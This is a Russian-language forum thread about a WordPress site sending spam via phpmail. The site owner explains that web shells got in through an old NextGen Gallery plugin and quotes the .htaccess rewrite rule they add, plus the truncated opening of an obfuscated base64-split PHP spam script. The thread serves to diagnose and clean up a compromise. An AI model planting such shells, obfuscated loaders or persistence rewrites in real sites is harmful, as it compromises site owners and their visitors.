Спам с сервера phpmail

вангую что через уязвимость самой CMS (левые модули, к примеру)

но, конечно, ТС сможет больше пролить света на этот вопрос

интересно, кстати, было бы узнать что там за CMS и модули

CMS - WP, модуль 1 - ALL-in-SEO, он не дырявый.

Дело в том, что год назад на сайте стояла Next Gen Gallery, через нее шеллы попали в папку с фотками аля uploads/2013/04, этот шелл не активный когда спамилка работает, но где то раз в сутки идет запрос к нему и он заново постепенно меняет права в папках и дописывает строчку .htaccess

RewriteRule ^(topicsin.php*)$  /var/www/ххх/data/www/ххх.ru/wp-includes/topicsin.php [L]

Содержимое этого файла примерно такое:

<?php $GLOBALS['_hrthhrth_']=Array(base64_decode('YmFzZTY0X' .'2' .'RlY29kZQ=='),base64_decode('' .'YmFz' .'Z' .'TY0' .'X2' .'RlY29kZQ=='),base64_decode('YmF' .'zZTY0X2Rl' .'Y29' .'kZ' .'Q=' .'='),base64_decode('YmFzZ' .'TY0X2R' .'l' .'Y29k' .'ZQ=='),base64_decode('Ym' .'Fz' .'Z' .'T' .'Y0X' .'2' .'RlY29kZ' .'Q=='),base64_decode('YmFzZTY0X' .'2RlY29kZQ=='),base64_decode('YmFzZTY0X2' .'R' .'lY' .'29k' .'ZQ' .'=='),base64_decode('' .'YmFzZTY0X2RlY2' .'9kZQ=='),base64_decode('YmFzZTY0X2R' .'lY29' .'kZ' 

И так далее.

Поэтому когда перестанавливаешь wp, и заливаешь чистую папку с шаблоном, и вроде как с фотками, все повторяется вновь.

Может кому поможет.